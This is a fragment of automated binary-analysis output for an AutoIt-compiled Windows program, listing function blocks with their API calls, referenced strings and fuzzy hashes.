                                                • Opcode ID: ae6f603284d990690cb7374eb3b5ab91c078c1da7edd22dffe104e6feea3b9bc
                                                • Instruction ID: f9d22d64248c37b03bb45298f307d52e0033422b370dae971cd419cf7f29b8df
                                                • Opcode Fuzzy Hash: ae6f603284d990690cb7374eb3b5ab91c078c1da7edd22dffe104e6feea3b9bc
                                                • Instruction Fuzzy Hash: A911D03195221EABCB20DB58DD14BF977BBFB01310F1440A5EA54E73A0E7B0AD04CB95
                                                APIs
                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00702520
                                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00702549
                                                Similarity
                                                • API ID: Internet$OpenOption
                                                • String ID: <local>
                                                • API String ID: 942729171-4266983199
                                                • Opcode ID: db0af2c811029dc427bb42d0313ff876959e5d1b86ebe8a57670fb75de938070
                                                • Instruction ID: 5883f34bc5f5a38d4ea651a9e54df6d5a76e88f63a30a4a587edbba53754867e
                                                • Opcode Fuzzy Hash: db0af2c811029dc427bb42d0313ff876959e5d1b86ebe8a57670fb75de938070
                                                • Instruction Fuzzy Hash: 8811E372100225FADB248F518C9DEFBFFA8FB05355F10826AF50542181D3785952D6E0
                                                APIs
                                                  • Part of subcall function 0070830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,007080C8,?,00000000,?,?), ref: 00708322
                                                • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 007080CB
                                                • htons.WSOCK32(00000000,?,00000000), ref: 00708108
                                                Similarity
                                                • API ID: ByteCharMultiWidehtonsinet_addr
                                                • String ID: 255.255.255.255
                                                • API String ID: 2496851823-2422070025
                                                • Opcode ID: 731c42dfa174f9321d3b3cb6eacc61ea37aa1ec01e42b6613c859ed91c695d2b
                                                • Instruction ID: 9e3df8aa3a003597109efde44d1fcb7f97cb279dadc322c482775502b50d32eb
                                                • Opcode Fuzzy Hash: 731c42dfa174f9321d3b3cb6eacc61ea37aa1ec01e42b6613c859ed91c695d2b
                                                • Instruction Fuzzy Hash: E811E534500309EBDB10AF68CC86FEDB365FF14320F10862AF951A72D2DB35A811C75A
                                                APIs
                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00693C26,007562F8,?,?,?), ref: 006A0ACE
                                                  • Part of subcall function 00697D2C: _memmove.LIBCMT ref: 00697D66
                                                • _wcscat.LIBCMT ref: 006D50E1
                                                Similarity
                                                • API ID: FullNamePath_memmove_wcscat
                                                • String ID: cu
                                                • API String ID: 257928180-2324572491
                                                • Opcode ID: 6b9c1b87b27f786a532337131380c833fcda5970becd0c95eb333970c7458d82
                                                • Instruction ID: ecdc0eee7f9da47c5cbaa867adbc63737ebdd790e1e9312c2f61a5420a64413e
                                                • Opcode Fuzzy Hash: 6b9c1b87b27f786a532337131380c833fcda5970becd0c95eb333970c7458d82
                                                • Instruction Fuzzy Hash: 2D1165359042089B9B81FB64CD01ED977BEEF09350B0040A9F949D7291EA75DF898B25
                                                APIs
                                                  • Part of subcall function 00697F41: _memmove.LIBCMT ref: 00697F82
                                                  • Part of subcall function 006EB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 006EB0E7
                                                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 006E9355
                                                Similarity
                                                • API ID: ClassMessageNameSend_memmove
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 372448540-1403004172
                                                • Opcode ID: b5484f24eb560e24f4dcb28ea8b96ddf881834035a7af277a5bd533cfb910a4e
                                                • Instruction ID: 57c547d36bb1bd1cf805d7b44424ddfd92e4c80b7c8270aade7d9dcff0b1a250
                                                • Opcode Fuzzy Hash: b5484f24eb560e24f4dcb28ea8b96ddf881834035a7af277a5bd533cfb910a4e
                                                • Instruction Fuzzy Hash: 37019E71A06314AB8F04EBA5CC928FE776EBF06320B140619F932676E2DB3569089664
                                                APIs
                                                  • Part of subcall function 00697F41: _memmove.LIBCMT ref: 00697F82
                                                  • Part of subcall function 006EB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 006EB0E7
                                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 006E924D
                                                Similarity
                                                • API ID: ClassMessageNameSend_memmove
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 372448540-1403004172
                                                • Opcode ID: 3ce2074c89893be85c66a9159f2c1d1786bb1becaf0ddb7413cfd3b56fc9187c
                                                • Instruction ID: ffc104ac53512dd50fda192439554b3021c168203affa99d047aee508db6d2c2
                                                • Opcode Fuzzy Hash: 3ce2074c89893be85c66a9159f2c1d1786bb1becaf0ddb7413cfd3b56fc9187c
                                                • Instruction Fuzzy Hash: D301D471A423047BCF04EBA1C992DFF73AE9F05300F240019BA12676D1EA156F0C9675
                                                APIs
                                                  • Part of subcall function 00697F41: _memmove.LIBCMT ref: 00697F82
                                                  • Part of subcall function 006EB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 006EB0E7
                                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 006E92D0
                                                Similarity
                                                • API ID: ClassMessageNameSend_memmove
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 372448540-1403004172
                                                • Opcode ID: ec747267dc8230c6548974f949e32e9abd82ea5c1722d6a760fc8ff79f8e4976
                                                • Instruction ID: 72dc108d9ac2ae9e73097fa70ca42499d7b907c2fd487f5a55a22a750b118bf8
                                                • Opcode Fuzzy Hash: ec747267dc8230c6548974f949e32e9abd82ea5c1722d6a760fc8ff79f8e4976
                                                • Instruction Fuzzy Hash: 1801F771A423047BCF00E6A5C982DFF73AE9F00300F240019B902676D1DB155F089679
                                                Similarity
                                                • API ID: __calloc_crt
                                                • String ID: @Ru
                                                • API String ID: 3494438863-658108087
                                                • Opcode ID: 73b40c6363bc33376fa92a82675f62b2f115defd1f5105e92889bcb071325fdd
                                                • Instruction ID: 8240d25e32e057f0c2da3a268e3b05b711cef9e8c1224859add757292748bbcb
                                                • Opcode Fuzzy Hash: 73b40c6363bc33376fa92a82675f62b2f115defd1f5105e92889bcb071325fdd
                                                • Instruction Fuzzy Hash: 1FF04FB1B097169BE7649F18FD016E13796FB41721F50852AF101CB290EBBC88C18799
                                                Similarity
                                                • API ID: ClassName_wcscmp
                                                • String ID: #32770
                                                • API String ID: 2292705959-463685578
                                                • Opcode ID: 6cb92cab7677c304bb8ce1d89766c2612d291b9a0e033c88e670b839e6b18fc7
                                                • Instruction ID: e8365104051d5c7ac32a4c2eb0ab2385e8db5736ee2ee6542944b470896d2ae4
                                                • Opcode Fuzzy Hash: 6cb92cab7677c304bb8ce1d89766c2612d291b9a0e033c88e670b839e6b18fc7
                                                • Instruction Fuzzy Hash: FEE02B7260022C26D7109699AC09AE7F7ACEB40721F00016BF910D3180E5649A4487D4
                                                APIs
                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 006E81CA
                                                  • Part of subcall function 006B3598: _doexit.LIBCMT ref: 006B35A2
                                                Similarity
                                                • API ID: Message_doexit
                                                • String ID: AutoIt$Error allocating memory.
                                                • API String ID: 1993061046-4017498283
                                                • Opcode ID: 2cffbecf086631e3e3eb277f7ab48d02cf638cd136ef177238f45779650ce4ac
                                                • Instruction ID: 80d9a4448ee5e98c59713b873a116cff98d6ba2ff822631cc1c779c10d3b5739
                                                • Opcode Fuzzy Hash: 2cffbecf086631e3e3eb277f7ab48d02cf638cd136ef177238f45779650ce4ac
                                                • Instruction Fuzzy Hash: C3D05B723C536C36D26433E96C07FC675494F15B51F504019FB08555D38ED555C243ED
                                                APIs
                                                  • Part of subcall function 006CB564: _memset.LIBCMT ref: 006CB571
                                                  • Part of subcall function 006B0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,006CB540,?,?,?,0069100A), ref: 006B0B89
                                                • IsDebuggerPresent.KERNEL32(?,?,?,0069100A), ref: 006CB544
                                                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0069100A), ref: 006CB553
                                                Strings
                                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 006CB54E
                                                Similarity
                                                • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                • API String ID: 3158253471-631824599
                                                • Opcode ID: cd59340c578646774db811852b980d474c4e5fb3165bfbfb54f9fe8ba8cf816b
                                                • Instruction ID: 83692c5f5c307df6aabf8c6375adfd00663f20f8d50afd82f6c2a660f7d6ca5d
                                                • Opcode Fuzzy Hash: cd59340c578646774db811852b980d474c4e5fb3165bfbfb54f9fe8ba8cf816b
                                                • Instruction Fuzzy Hash: 36E06DB02003118FE760EF28E4097927BE4EB00704F00C92CE446C3752DBB8E444CB65